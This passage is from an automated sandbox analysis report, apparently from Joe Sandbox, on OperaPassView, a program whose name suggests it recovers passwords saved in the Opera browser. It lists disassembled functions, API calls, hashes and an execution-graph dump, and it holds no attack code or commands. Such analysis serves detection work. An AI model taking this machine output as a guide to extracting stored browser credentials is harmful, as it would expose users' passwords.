                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: f5@$@
                                        • API String ID: 3850602802-1863846301
                                        • Opcode ID: 5fd78c676e631c3709107cb9d65915e65d3b6653e538a2b2a1514ac77431e71f
                                        • Instruction ID: 70b6a3239b96f3e75da7ea75169189ebfa639c78ed79f00fa946d4b3eb5f7a99
                                        • Opcode Fuzzy Hash: 5fd78c676e631c3709107cb9d65915e65d3b6653e538a2b2a1514ac77431e71f
                                        • Instruction Fuzzy Hash: 7B518330A00205AADF60BB218945F9A73A5AB10324F10C53FF4997F2E1DEBC59C18F4D
                                        Function 0040641A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcschr.MSVCRT ref: 00406449
                                        • wcschr.MSVCRT ref: 00406457
                                          • Part of subcall function 004063AF: memset.MSVCRT ref: 004063D4
                                          • Part of subcall function 004063AF: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,0040C4E0,?,?,?,?,?,00401FB3), ref: 004063ED
                                          • Part of subcall function 004063AF: strlen.MSVCRT ref: 004063FF
                                          • Part of subcall function 004063AF: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,00401FB3,?,?,00000008), ref: 00406410
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcschr$ByteCharFileMultiWideWritememsetstrlen
                                        • String ID: "
                                        • API String ID: 3380400052-123907689
                                        • Opcode ID: 42c06210ac77bc4897aff97fd64da6e708580b768c0c9cafe00fed859f45ae67
                                        • Instruction ID: 2b2664d594544958fba6627fb4497dfc09889f1935fb328af1c9ed3c8cb62cbb
                                        • Opcode Fuzzy Hash: 42c06210ac77bc4897aff97fd64da6e708580b768c0c9cafe00fed859f45ae67
                                        • Instruction Fuzzy Hash: BB316D71904218AFDF14AFA5CC419EEB7B8EF44324F21812BE811B71D1DB789A529A9C
                                        Function 004078E5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • qsort.MSVCRT ref: 004079B4
                                          • Part of subcall function 004047CA: _wcsicmp.MSVCRT ref: 004047E0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _wcsicmpqsort
                                        • String ID: /nosort$/sort
                                        • API String ID: 1579243037-1578091866
                                        • Opcode ID: 28e8b9eeae73f08da568e07234b3670defb4d434af77f155d27e67a09f67c443
                                        • Instruction ID: c613dfa10845265b9001ee98788bfcdc0d385a2ee53f21912ea71c72832a41b0
                                        • Opcode Fuzzy Hash: 28e8b9eeae73f08da568e07234b3670defb4d434af77f155d27e67a09f67c443
                                        • Instruction Fuzzy Hash: 4921F2B1B04501AFD714AF36C880E56B3AAFFA5314B11017EE615BB2D1CB79B811CB9A
                                        Function 004042BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        • _snwprintf.MSVCRT ref: 00404301
                                        • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 00404311
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _snwprintfmemcpy
                                        • String ID: %2.2X
                                        • API String ID: 2789212964-323797159
                                        • Opcode ID: 6a23412141f1501ece79e54fe078a7de92c685d9ae7c75e59bd685d64d1c1fe3
                                        • Instruction ID: 773ebf4e3c3b42aeb52fcb9d4681768b59ff38d30494755ab7908b074b5742af
                                        • Opcode Fuzzy Hash: 6a23412141f1501ece79e54fe078a7de92c685d9ae7c75e59bd685d64d1c1fe3
                                        • Instruction Fuzzy Hash: E5118671A00208BFDB10DFE8C8819DF73B4FB44314F104476EE14E7181D6789A058BD9
                                        Function 00406646 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • _snwprintf.MSVCRT ref: 00406674
                                        • _snwprintf.MSVCRT ref: 00406694
                                          • Part of subcall function 00403992: wcslen.MSVCRT ref: 0040399F
                                          • Part of subcall function 00403992: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00406A3F,?,<item>), ref: 004039AE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _snwprintf$FileWritewcslen
                                        • String ID: %%-%d.%ds
                                        • API String ID: 889019245-2008345750
                                        • Opcode ID: 9b360df86315a4d0fc8687c9d094769c5241e7bd0f342b486d010c923cc8926d
                                        • Instruction ID: 279801148e76b0a9075c42a2eba3bd7f9e0035b97abbdc6c8671880a9300571e
                                        • Opcode Fuzzy Hash: 9b360df86315a4d0fc8687c9d094769c5241e7bd0f342b486d010c923cc8926d
                                        • Instruction Fuzzy Hash: 8C019271100204AFC710AF59CC82D5AB7ADFB48318B11483EF946AB192D676F8519B68
                                        Function 00405672 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040568B
                                        • SendMessageW.USER32((8@,0000105F,00000000,?), ref: 004056B9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: MessageSendmemset
                                        • String ID: (8@
                                        • API String ID: 568519121-2824614689
                                        • Opcode ID: b9b052f7272240faca1b1630d4f7d6d0b9aad55754f91eff3e97a74e79ecb4b9
                                        • Instruction ID: 6449b0a7daa4ed240facb274c3a900b9879f3f9cf80db6cf5f8cf744cfdf067d
                                        • Opcode Fuzzy Hash: b9b052f7272240faca1b1630d4f7d6d0b9aad55754f91eff3e97a74e79ecb4b9
                                        • Instruction Fuzzy Hash: 5E01A275800609AFDB208F45C885AAFB7B8FF81745F50482AE844BB281D3359945CB79
                                        Function 00404DFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: TextWindowmemset
                                        • String ID: caption
                                        • API String ID: 2590972913-4135340389
                                        • Opcode ID: bd9d412dde3222f547a0bd8750d1c8608e205217c0b73fdaf50cdbc3768e5135
                                        • Instruction ID: 2db4a85a8052f98b084067700c6c2493da5e0403811a3532aa4b5108901f4221
                                        • Opcode Fuzzy Hash: bd9d412dde3222f547a0bd8750d1c8608e205217c0b73fdaf50cdbc3768e5135
                                        • Instruction Fuzzy Hash: 8BF0A9B2D40314AAEB206B55DC4ABCA366CEB44754F0000B6BB04B61D2D7B8AD80CBDC
                                        Function 004017C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: PlacementWindowmemset
                                        • String ID: WinPos
                                        • API String ID: 4036792311-2823255486
                                        • Opcode ID: f64d20f70bd67578458b35ede7a69f7856e7be3fe24160ed828cbcd4216c948e
                                        • Instruction ID: 813b7da2fed051c357424ccd667ed75c52a95f27b445824e5a4df21e48fe23d2
                                        • Opcode Fuzzy Hash: f64d20f70bd67578458b35ede7a69f7856e7be3fe24160ed828cbcd4216c948e
                                        • Instruction Fuzzy Hash: 9AF06271600204EFEB04EF95C889F6A33A8EF04700F144079E909EB1D1E7B8AA00CB69
                                        Function 00405567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00403CE2: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040556D,00000000,00405420,?,00000000,00000208), ref: 00403CED
                                        • wcsrchr.MSVCRT ref: 00405570
                                        • wcscat.MSVCRT ref: 00405586
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: FileModuleNamewcscatwcsrchr
                                        • String ID: _lng.ini
                                        • API String ID: 383090722-1948609170
                                        • Opcode ID: 70b132c861c53a5e80b6cd8212b27e2896445419851ca4d991723d1737cddbc7
                                        • Instruction ID: 96025fcac0a5ccfddca65140341af9a58aeb290220dbc56d4301e319b9ea4a6a
                                        • Opcode Fuzzy Hash: 70b132c861c53a5e80b6cd8212b27e2896445419851ca4d991723d1737cddbc7
                                        • Instruction Fuzzy Hash: 1FC01262A46B2028E21232225E03B4A124CDF42714F60083BFC00750C6FFBEA65940AE
                                        Function 004056F8 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004040CA: memset.MSVCRT ref: 004040D8
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,00000000,00408B1D,00000000,?,?,?,00408DCA), ref: 00405715
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,00408B1D,00000000,?,?,?,00408DCA), ref: 0040573C
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,00408B1D,00000000,?,?,?,00408DCA), ref: 0040575D
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,00408B1D,00000000,?,?,?,00408DCA), ref: 0040577E
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??2@$memset
                                        • String ID:
                                        • API String ID: 1860491036-0
                                        • Opcode ID: df11e75221f36aa136dd2a530cfc53c12a22ff0e5e946e70cf3a3ed6d6825f66
                                        • Instruction ID: af581bbccb9086d889a36cfff49bdd0ea8f57c867f74f292b53e8b0c34c2ba8d
                                        • Opcode Fuzzy Hash: df11e75221f36aa136dd2a530cfc53c12a22ff0e5e946e70cf3a3ed6d6825f66
                                        • Instruction Fuzzy Hash: C8218EB4A11701CED7159F2A9444916FBE8FFD0310B2A89AFD118DB2B2D7B8C8409F69
                                        Function 004044AB Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcslen.MSVCRT ref: 004044B8
                                        • free.MSVCRT ref: 004044DB
                                          • Part of subcall function 00403C2B: malloc.MSVCRT ref: 00403C47
                                          • Part of subcall function 00403C2B: memcpy.MSVCRT(00000000,00000000,?,00000000,?,00402298,00000002,?,?,?,00401B5C,?), ref: 00403C5F
                                          • Part of subcall function 00403C2B: free.MSVCRT ref: 00403C68
                                        • free.MSVCRT ref: 004044FE
                                        • memcpy.MSVCRT(?,?,?), ref: 00404522
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: free$memcpy$mallocwcslen
                                        • String ID:
                                        • API String ID: 726966127-0
                                        • Opcode ID: d4fc3262eca6a9203210309d0fdc2fcf5fe16143f3354878ebb1b6485f4fe0d1
                                        • Instruction ID: 6e423bbbc95361190f821a2eaa1269f95e241a9315f3886d9563661ffd26abd2
                                        • Opcode Fuzzy Hash: d4fc3262eca6a9203210309d0fdc2fcf5fe16143f3354878ebb1b6485f4fe0d1
                                        • Instruction Fuzzy Hash: A721A1B5100704EFC730DF28D881CAAB7F8EF843247108A2EF552A7691D735BD058B58

                                        Execution Graph

                                        Execution Coverage:12.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:1.2%
                                        Total number of Nodes:1805
                                        Total number of Limit Nodes:24
                                        execution_graph 5489 40b7c0 5492 40b458 5489->5492 5495 40b432 5492->5495 5494 40b461 5496 40b441 __dllonexit 5495->5496 5497 40b43b _onexit 5495->5497 5496->5494 5497->5496 4726 40b441 __dllonexit 5498 4014c6 5499 409e0d 4 API calls 5498->5499 5500 4014d4 5499->5500 4727 406a47 4728 406ac3 4727->4728 4729 406a5c 4727->4729 4729->4728 4730 406a6a memset 4729->4730 4731 406a8d 4730->4731 4731->4728 4732 406a91 _snwprintf SendMessageW 4731->4732 4732->4728 5501 4021c9 5502 4022d1 5501->5502 5507 4021dc 5501->5507 5514 407331 5502->5514 5504 404eeb 7 API calls 5504->5507 5505 40215a memset WideCharToMultiByte strlen WriteFile 5505->5507 5506 404eab free 5506->5507 5507->5504 5507->5505 5507->5506 5508 4022bd 5507->5508 5511 40215a 5508->5511 5510 4022ca 5512 40b780 5511->5512 5513 402167 memset WideCharToMultiByte strlen WriteFile 5512->5513 5513->5510 5515 407352 5514->5515 5516 407345 5514->5516 5517 407366 5515->5517 5518 407357 5515->5518 5519 406d7d 2 API calls 5516->5519 5521 407378 5517->5521 5522 40736b 5517->5522 5520 406c4e 14 API calls 5518->5520 5531 407350 5519->5531 5520->5531 5524 40738c 5521->5524 5525 40737d 5521->5525 5535 406ea0 5522->5535 5527 4073a0 5524->5527 5528 407391 5524->5528 5543 406f1c 5525->5543 5529 4073b2 5527->5529 5530 4073a5 5527->5530 5555 407044 memset memset memset memset 5528->5555 5529->5531 5591 407282 5529->5591 5577 406ddd 5530->5577 5531->5510 5536 406f07 5535->5536 5537 406eae 5535->5537 5603 404248 wcslen WriteFile 5536->5603 5537->5536 5538 406eaf _snwprintf 5537->5538 5541 406ee1 _snwprintf 5538->5541 5540 406f15 5540->5531 5602 404248 wcslen WriteFile 5541->5602 5604 404248 wcslen WriteFile 5543->5604 5545 40702f 5628 404248 wcslen WriteFile 5545->5628 5547 40703c 5547->5531 5550 406fe5 wcscat 5551 406f53 5550->5551 5551->5545 5551->5550 5605 40aeb5 _snwprintf 5551->5605 5606 40aee6 5551->5606 5612 40af85 memset memset 5551->5612 5556 4070ca 5555->5556 5557 4070fc 5556->5557 5630 40aeb5 _snwprintf 5556->5630 5631 404248 wcslen WriteFile 5557->5631 5560 4070e5 _snwprintf 5560->5557 5561 40725f 5635 404248 wcslen WriteFile 5561->5635 5563 40726c 5636 404248 wcslen WriteFile 5563->5636 5564 407133 wcscpy 5573 407109 5564->5573 5566 407279 5566->5531 5568 40aee6 3 API calls 5568->5573 5569 4071d6 wcscpy 5569->5573 5571 4071bc _snwprintf 5571->5573 5572 4071f8 wcscat 5572->5573 5573->5561 5573->5564 5573->5568 5573->5569 5573->5572 5574 40af85 13 API calls 5573->5574 5632 40aeb5 _snwprintf 5573->5632 5633 40aeb5 _snwprintf 5573->5633 5575 407213 _snwprintf 5574->5575 5634 404248 wcslen WriteFile 5575->5634 5637 404248 wcslen WriteFile 5577->5637 5579 406e19 5638 404248 wcslen WriteFile 5579->5638 5581 406e27 5582 406e71 5581->5582 5585 406e40 _snwprintf 5581->5585 5640 404248 wcslen WriteFile 5582->5640 5584 406e85 5641 404248 wcslen WriteFile 5584->5641 5639 404248 wcslen WriteFile 5585->5639 5588 406e8e 5642 404248 wcslen WriteFile 5588->5642 5590 406e97 5590->5531 5643 404248 wcslen WriteFile 5591->5643 5593 407299 5594 4072a3 memset 5593->5594 5597 40aee6 3 API calls 5593->5597 5598 406b6d 2 API calls 5593->5598 5601 40731c 5593->5601 5594->5593 5596 40732a 5596->5531 5597->5593 5599 4072ef _snwprintf 5598->5599 5644 404248 wcslen WriteFile 5599->5644 5645 404248 wcslen WriteFile 5601->5645 5602->5537 5603->5540 5604->5551 5605->5551 5611 40aef0 5606->5611 5607 40af62 memcpy 5607->5611 5608 40af15 memcpy 5608->5611 5609 40af81 5609->5551 5610 40af48 memcpy 5610->5611 5611->5607 5611->5608 5611->5609 5611->5610 5613 40afd1 5612->5613 5614 40afe8 wcscpy 5613->5614 5615 40b06c 5613->5615 5616 40b023 5614->5616 5617 40affc _snwprintf wcscat 5614->5617 5618 40b071 wcscat 5615->5618 5619 40b07e wcscat 5615->5619 5620 40b05f wcscat 5616->5620 5629 40aeb5 _snwprintf 5616->5629 5617->5616 5618->5619 5621 40b09b 5619->5621 5622 40b08e wcscat 5619->5622 5620->5615 5624 40b0a0 wcscat 5621->5624 5625 407000 _snwprintf 5621->5625 5622->5621 5624->5625 5627 404248 wcslen WriteFile 5625->5627 5626 40b038 _snwprintf wcscat 5626->5620 5627->5551 5628->5547 5629->5626 5630->5560 5631->5573 5632->5573 5633->5571 5634->5573 5635->5563 5636->5566 5637->5579 5638->5581 5639->5581 5640->5584 5641->5588 5642->5590 5643->5593 5644->5593 5645->5596 4733 40834b 4765 4056c4 4733->4765 4736 40849e SendMessageW GetModuleHandleW LoadImageW 4737 4084fc GetModuleHandleW CreateWindowExW 4736->4737 4738 401f98 33 API calls 4737->4738 4739 40853e 4738->4739 4740 408584 4739->4740 4773 4026de 4739->4773 4776 407a2b 4740->4776 4743 4085a3 GetModuleHandleW LoadIconW 4744 4085c1 4743->4744 4745 4056c4 16 API calls 4744->4745 4746 4085c9 4745->4746 4747 4050bf _wcsicmp 4746->4747 4748 4085df 4747->4748 4749 408a99 19 API calls 4748->4749 4750 4085f3 SetFocus 4749->4750 4751 40863b wcslen wcslen 4750->4751 4752 40861f 4750->4752 4754 408670 4751->4754 4755 40865b 4751->4755 4753 404571 2 API calls 4752->4753 4756 408624 GetFileAttributesW 4753->4756 4790 407bd6 SendMessageW 4754->4790 4757 40468e 4 API calls 4755->4757 4756->4751 4758 40862f GetTempPathW 4756->4758 4757->4754 4758->4751 4760 40868b 4793 40831a 4760->4793 4766 405557 GetModuleHandleW 4765->4766 4767 4056cb LoadMenuW 4766->4767 4768 4056f7 SetMenu 4767->4768 4769 4056de 4767->4769 4768->4736 4835 405893 4769->4835 4771 4056ee 4842 405568 4771->4842 4774 402704 SendMessageW 4773->4774 4775 4026fa wcslen 4773->4775 4774->4739 4775->4774 4777 407a51 4776->4777 4778 407ad5 4776->4778 4780 407aa3 SendMessageW 4777->4780 4781 407a59 memset SHGetFileInfoW SendMessageW 4777->4781 4779 407b0d GetModuleHandleW LoadImageW GetModuleHandleW LoadImageW 4778->4779 4784 407afb SendMessageW 4778->4784 4785 407b6c GetSysColor 4779->4785 4780->4778 4781->4778 4784->4779 4786 407b8b DeleteObject DeleteObject 4785->4786 4853 4027dd SendMessageW 4786->4853 4789 407bc1 SendMessageW 4789->4743 4791 407bfa SendMessageW 4790->4791 4791->4760 4794 407bd6 2 API calls 4793->4794 4795 408337 4794->4795 4796 407bd6 2 API calls 4795->4796 4797 408348 RegisterClipboardFormatW 4796->4797 4798 407e37 4797->4798 4854 40676b 4798->4854 4802 407e6b 4803 407e7f 4802->4803 4867 4019fb SendMessageW 4802->4867 4805 40676b 3 API calls 4803->4805 4806 407e8c 4805->4806 4807 4019b4 3 API calls 4806->4807 4808 407eb1 4807->4808 4809 407ec3 4808->4809 4810 4019fb 2 API calls 4808->4810 4811 4019b4 3 API calls 4809->4811 4810->4809 4812 407edf 4811->4812 4813 407ef1 4812->4813 4814 4019fb 2 API calls 4812->4814 4815 4019b4 3 API calls 4813->4815 4814->4813 4816 407f03 4815->4816 4870 406204 4816->4870 4819 4019b4 3 API calls 4820 407f1e 4819->4820 4873 4043a2 4820->4873 4822 407f37 4823 4043a2 3 API calls 4822->4823 4824 407f50 4823->4824 4825 4043a2 3 API calls 4824->4825 4826 407f6c 4825->4826 4827 406204 SendMessageW 4826->4827 4828 407f7a 4827->4828 4829 4019b4 3 API calls 4828->4829 4830 407f94 4829->4830 4831 4019b4 3 API calls 4830->4831 4832 407fb0 4831->4832 4833 407fc2 SendMessageW SendMessageW 4832->4833 4834 4019fb 2 API calls 4832->4834 4834->4833 4836 4058a3 4835->4836 4837 405898 _snwprintf 4835->4837 4836->4837 4840 4058c1 4836->4840 4837->4771 4839 4058d6 wcscpy 4841 4058e2 4839->4841 4840->4839 4840->4841 4841->4771 4843 40b780 4842->4843 4844 405578 GetMenuItemCount 4843->4844 4845 4056bd 4844->4845 4848 405596 4844->4848 4845->4768 4846 40559b memset GetMenuItemInfoW 4846->4848 4847 4055f6 memset wcschr 4847->4848 4848->4845 4848->4846 4848->4847 4849 405568 5 API calls 4848->4849 4850 4058e3 5 API calls 4848->4850 4851 405667 wcscat 4848->4851 4852 40567a ModifyMenuW 4848->4852 4849->4848 4850->4848 4851->4852 4852->4848 4853->4789 4855 4067b2 SendMessageW 4854->4855 4856 406779 4854->4856 4858 4067ab 4855->4858 4856->4855 4857 40677e 4856->4857 4876 402ad0 SendMessageW 4857->4876 4862 4019b4 4858->4862 4861 40678f 4861->4858 4877 402ae4 SendMessageW 4861->4877 4863 4019e2 4862->4863 4864 4019be GetMenu GetSubMenu 4862->4864 4866 4019f1 EnableMenuItem 4863->4866 4864->4866 4866->4802 4868 401a1d SendMessageW 4867->4868 4868->4803 4878 402ad0 SendMessageW 4870->4878 4872 40620f 4872->4819 4874 4043aa 4873->4874 4875 4043ad GetMenu GetSubMenu CheckMenuItem 4873->4875 4874->4875 4875->4822 4876->4861 4877->4861 4878->4872 5646 401fcb 5647 40b780 5646->5647 5648 401fd8 memset 5647->5648 5669 404cf4 MultiByteToWideChar 5648->5669 5650 40201f 5670 404cdf 5650->5670 5653 404cdf 2 API calls 5654 402043 5653->5654 5673 404cf4 MultiByteToWideChar 5654->5673 5656 402056 5674 404cf4 MultiByteToWideChar 5656->5674 5658 402069 5675 404cf4 MultiByteToWideChar 5658->5675 5660 40207c 5661 4044b1 2 API calls 5660->5661 5662 402093 wcscmp 5661->5662 5663 4020c3 5662->5663 5664 4020ba 5662->5664 5676 401b06 wcslen 5663->5676 5688 406ac6 5664->5688 5669->5650 5671 4044b1 2 API calls 5670->5671 5672 402031 5671->5672 5672->5653 5673->5656 5674->5658 5675->5660 5677 401cab 5676->5677 5687 401b5d 5676->5687 5678 401cf8 log log 5677->5678 5679 401d3f 5677->5679 5681 401d3b _wcsicmp 5678->5681 5682 401d31 free 5678->5682 5680 401d45 free 5679->5680 5679->5681 5680->5681 5681->5664 5682->5681 5684 